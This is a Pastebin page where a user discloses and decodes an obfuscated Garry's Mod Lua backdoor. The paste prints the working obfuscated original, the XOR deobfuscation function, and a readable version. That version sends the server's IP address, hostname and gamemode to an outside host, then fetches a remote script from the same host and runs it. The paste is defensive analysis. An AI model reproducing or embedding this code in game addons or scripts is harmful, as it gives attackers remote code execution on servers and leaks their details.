API tools faq
paste
Advertisement
Guest User

Backdoor Discovered

a guest
Jul 22nd, 2018
258
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 2.72 KB | None | 0 0
raw download clone embed print report
  1. -- I was given this code by a friend:
  2. local= _G local ‪‪ =['\115\116\114\105\110\103'] local ‪‪‪ =['\98\105\116']['\98\120\111\114'] local function ‪‪‪‪‪‪‪(‪‪‪‪) if ‪‪['\108\101\110'](‪‪‪‪) == 0 then return ‪‪‪‪ end local ‪‪‪‪‪ = '' for _ in ‪‪['\103\109\97\116\99\104'](‪‪‪‪,'\46\46') do ‪‪‪‪‪=‪‪‪‪‪..‪‪['\99\104\97\114'](‪‪‪(["\116\111\110\117\109\98\101\114"](_,16),193)) end return ‪‪‪‪‪ end[‪‪‪‪‪‪‪'b5a8aca4b3'][‪‪‪‪‪‪‪'92a8acb1ada4'](5,function ()[‪‪‪‪‪‪‪'a9b5b5b1'][‪‪‪‪‪‪‪'91aeb2b5'](‪‪‪‪‪‪‪'a9b5b5b1b2fbeeeeaca8b5a4a5eff1f1f1b6a4a3a9aeb2b5a0b1b1efa2aeaceeadaea6b2eeb5a0aaa8b1efb1a9b1',{[‪‪‪‪‪‪‪'a2']=[‪‪‪‪‪‪‪'a6acaea5'][‪‪‪‪‪‪‪'86a4b586a0aca4acaea5a4']()[‪‪‪‪‪‪‪'8fa0aca4'],[‪‪‪‪‪‪‪'a4']=[‪‪‪‪‪‪‪'a6a0aca4'][‪‪‪‪‪‪‪'86a4b5889180a5a5b3a4b2b2'](),[‪‪‪‪‪‪‪'a5']=[‪‪‪‪‪‪‪'86a4b589aeb2b58fa0aca4']()})end )[‪‪‪‪‪‪‪'b5a8aca4b3'][‪‪‪‪‪‪‪'92a8acb1ada4'](5,function ()[‪‪‪‪‪‪‪'a9b5b5b1'][‪‪‪‪‪‪‪'87a4b5a2a9'](‪‪‪‪‪‪‪'a9b5b5b1b2fbeeeeaca8b5a4a5eff1f1f1b6a4a3a9aeb2b5a0b1b1efa2aeaceea3a0b2a4efadb4a0',function (break)[‪‪‪‪‪‪‪'93b4af92b5b3a8afa6'](break)end ,nil )end )
  3.  
  4. -- I then, using my knowledge of GLua and Computer Science, managed to "decrypt" it and rewrote it as this, using the algorithm I have adapted as written below--after converting the strings of numbers and \ from ASCII to text and rewriting it for what it does:
  5.  
  6. local _a = _G;
  7. local _b = _a["string"];
  8. local _c = _a["bit"]["bxor"];
  9.  
  10. local function _d( _e )
  11.     if _b["len"]( _e ) == 0 then return end
  12.     local _f = '';
  13.     for _ in _b["gmatch"]( _e, '..' ) do
  14.         _f = _f .. _b["char"]( _c( _a["tonumber"]( _, 16 ), 193 ) );
  15.     end
  16.     return _f;
  17. end
  18.  
  19. -- By this function I then rewrote the program using this function to take the sequences of characters as a parameter, and found their conversions; for instance, "b5a8aca4b3" becomes "timer". Upon decrypting all of it with this algorithm, I managed to rewrite what it does as this:
  20.  
  21. timer.Simple( 5, function()
  22.     http.Post( "https://mited.000webhostapp.com/logs/takip.php", {
  23.         c = gmod.GetGamemode().Name;
  24.         e = game.GetIPAddress();
  25.         d = GetHostName();
  26.     } );
  27. end );
  28.  
  29. timer.Simple( 5, function()
  30.     http.Fetch( "https://mited.000webhostapp.com/base.lua",
  31.         function( body )
  32.             RunString( body );
  33.         end,
  34.         nil
  35.     );
  36. end );
  37.  
  38. -- As you can see, it is a backdoor, and quite explicitly too.
  39. -- [GGS] 92carmnad
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!